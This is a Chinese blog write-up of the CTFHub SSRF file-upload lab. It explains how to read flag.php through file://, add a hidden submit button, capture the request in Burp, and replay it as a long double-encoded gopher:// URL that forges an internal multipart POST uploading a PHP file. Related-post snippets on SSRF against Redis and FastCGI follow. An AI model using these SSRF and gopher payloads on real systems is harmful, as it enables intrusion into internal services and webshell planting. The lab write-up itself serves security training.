ctfhub web-SSRF(服务器请求伪造) 文件上传

最新推荐文章于 2024-03-13 13:35:06 发布
最新推荐文章于 2024-03-13 13:35:06 发布
阅读量383 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SinAlone/article/details/118364933
版权

提示:这次需要上传一个文件到flag.php了.祝你好运

使用file://伪协议查看flag.php的php源码

得知flag.php只接受来自127.0.0.1的访问

访问flag.php

观察到只有浏览文件没有提交文件,咱们打开f12自己给他加个提交。

然后选好要上传的文件成下图

文件随便是啥,咱就用个一句话木马

此时用burp抓包拦截请求,点击提交查询

得到如下包

将其中的Host内容改为

Host:127.0.0.1:80

之后将此包内容复制粘贴,将内容改成gopher协议的URL

就是url的编码,"\r''替换为"%0d", "\n"替换为"%0a",空格符替换成"%20"

二次编码就是在%后面多加个25,例如 "%0d"变为"%250d"

最后使用gopher伪协议拼接,由于代码太长,这里给一个其他大佬写的包的内容的编码

gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250d%25250aHost%25253A%25253127.0.0.1%25250d%25250aContent-Length%25253A%252520333%25250d%25250a%252543%252561%252563%252568%252565%25252d%252543%25256f%25256e%252574%252572%25256f%25256c%25253a%252520%25256d%252561%252578%25252d%252561%252567%252565%25253d%252530%25250d%25250a%252555%252570%252567%252572%252561%252564%252565%25252d%252549%25256e%252573%252565%252563%252575%252572%252565%25252d%252552%252565%252571%252575%252565%252573%252574%252573%25253a%252520%252531%25250d%25250a%25254f%252572%252569%252567%252569%25256e%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%25256d%252575%25256c%252574%252569%252570%252561%252572%252574%25252f%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%252562%25256f%252575%25256e%252564%252561%252572%252579%25253d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252555%252573%252565%252572%25252d%252541%252567%252565%25256e%252574%25253a%252520%25254d%25256f%25257a%252569%25256c%25256c%252561%25252f%252535%25252e%252530%252520%252528%252557%252569%25256e%252564%25256f%252577%252573%252520%25254e%252554%252520%252531%252530%25252e%252530%25253b%252520%252557%252569%25256e%252536%252534%25253b%252520%252578%252536%252534%252529%252520%252541%252570%252570%25256c%252565%252557%252565%252562%25254b%252569%252574%25252f%252535%252533%252537%25252e%252533%252536%252520%252528%25254b%252548%252554%25254d%25254c%25252c%252520%25256c%252569%25256b%252565%252520%252547%252565%252563%25256b%25256f%252529%252520%252543%252568%252572%25256f%25256d%252565%25252f%252538%252535%25252e%252530%25252e%252534%252531%252538%252533%25252e%252531%252530%252532%252520%252553%252561%252566%252561%252572%252569%25252f%252535%252533%252537%25252e%252533%252536%25250d%25250a%252541%252563%252563%252565%252570%252574%25253a%252520%252574%252565%252578%252574%25252f%252568%252574%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%252568%252574%25256d%25256c%25252b%252578%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%25256d%25256c%25253b%252571%25253d%252530%25252e%252539%25252c%252569%25256d%252561%252567%252565%25252f%252561%252576%252569%252566%25252c%252569%25256d%252561%252567%252565%25252f%252577%252565%252562%252570%25252c%252569%25256d%252561%252567%252565%25252f%252561%252570%25256e%252567%25252c%25252a%25252f%25252a%25253b%252571%25253d%252530%25252e%252538%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252573%252569%252567%25256e%252565%252564%25252d%252565%252578%252563%252568%252561%25256e%252567%252565%25253b%252576%25253d%252562%252533%25253b%252571%25253d%252530%25252e%252539%25250d%25250a%252552%252565%252566%252565%252572%252565%252572%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25252f%252575%252570%25256c%25256f%252561%252564%25255f%252573%252565%252572%25252e%252570%252568%252570%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%252545%25256e%252563%25256f%252564%252569%25256e%252567%25253a%252520%252567%25257a%252569%252570%25252c%252520%252564%252565%252566%25256c%252561%252574%252565%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%25254c%252561%25256e%252567%252575%252561%252567%252565%25253a%252520%25257a%252568%25252d%252543%25254e%25252c%25257a%252568%25253b%252571%25253d%252530%25252e%252539%25252c%252565%25256e%25253b%252571%25253d%252530%25252e%252538%25252c%252561%25256d%25253b%252571%25253d%252530%25252e%252537%25250d%25250a%252543%25256f%25256e%25256e%252565%252563%252574%252569%25256f%25256e%25253a%252520%252563%25256c%25256f%252573%252565%25250d%25250a%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252550%252548%252550%25255f%252553%252545%252553%252553%252549%25254f%25254e%25255f%252555%252550%25254c%25254f%252541%252544%25255f%252550%252552%25254f%252547%252552%252545%252553%252553%252522%25250d%25250a%25250d%25250a%252531%252532%252533%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252566%252569%25256c%252565%252522%25253b%252520%252566%252569%25256c%252565%25256e%252561%25256d%252565%25253d%252522%252531%252532%252533%25252e%252570%252568%252570%252522%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%25256f%252563%252574%252565%252574%25252d%252573%252574%252572%252565%252561%25256d%25250d%25250a%25250d%25250a%25253c%25253f%252570%252568%252570%252520%252570%252568%252570%252569%25256e%252566%25256f%252528%252529%25253b%25253f%25253e%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25252d%25252d%25250d%25250a

这题没给什么302.php,咱们直接从index.php跳转,从哪跳不是跳

SinAlone
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1496
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
CTFHUB-SSRF-上传文件
最新发布
weixin_68416970的博客
07-01 456
CTFHUB技能树、SSRF、上传文件的通关教程
CTFHub技能树笔记之SSRF:POST请求文件上传
weixin_48799157的博客
04-03 8043
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2199
ssrf
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2678
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2337
CTFhub ssrf 端口扫描&文件上传
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2802
SSRF相关题目实战
SSRF-Testing:SSRF(服务器请求伪造)测试资源
04-23
SSRF(服务器请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
008-Web安全基础4 - 请求伪造漏洞.pptx
10-11
CSRF 的全称是Cross-site request forgery,即跨站请求伪造,我们可以简单的理解这种漏洞为,攻击者利用被攻击者的身份发起了某些被攻击者原本不知情的网络请求。包括以被攻击者的身 份发布一条微博,以被攻击者的...
SSRF_Vulnerable_Lab:本实验包含易受服务器请求伪造攻击的示例代码
05-12
服务器请求伪造SSRF)易受攻击的实验室该存储库包含容易受到服务器请求伪造SSRF)攻击PHP代码。 我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
SSRF服务端请求伪造攻击-漏洞银行大咖面对面10-Mat
07-31
SSRF服务端请求伪造攻击-漏洞银行大咖面对面10-Mat
[WEB安全] 通过CTFHub学习SSRF
Only_kele_ 的博客
03-06 4371
目录1. ssrf简介2. 例题2.1 内网访问2.2 伪协议读文件2.3 端口扫描2.4 POST请求2.5 上传文件2.6 FastCGI协议2.7 Redis协议 1. ssrf简介 2. 例题 2.1 内网访问 2.2 伪协议读文件 2.3 端口扫描 2.4 POST请求 2.5 上传文件 直接看index.php文件,和之前的一样 再看flag.php文件,需要上传一个文件,而且只能本地上传 在POST请求那里,构造过POST请求,这里上传文件也一样,尝试构造一个文件上传的http请
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1757
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 506
CTFHUBssrf中文件上传的题目内容,记录自己遇到的问题
SSRF学习(5)gopher协议上传文件
m0_64417923的博客
05-14 672
题目:这次需要上传一个文件到flag.php了.祝你好运 首先从目标机本地访问flag.php: url=http://127.0.0.1/flag.php 得到一个文件上传的界面,需要上传一个Webshell。再查看源代码: /?url=file:///var/www/html/flag.php <?php ​ error_reporting(0); ​ if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ echo "...
CTFHUB技能树-SSRF【持续更新】
qq_33295410的博客
09-16 7013
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
SSRF详解 基于CTFHub(上篇)
Bossfrank的博客
04-28 1849
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
ssrf服务器请求伪造
07-22
SSRF 是一种安全漏洞,攻击者可以利用它来伪造服务器发出的请求。攻击者可以通过构造恶意请求,使服务器发送请求到内部网络或其他受保护的资源。 为了防止 SSRF 攻击,有几个建议和防护措施可以考虑: 1. 输入验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SinAlone

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值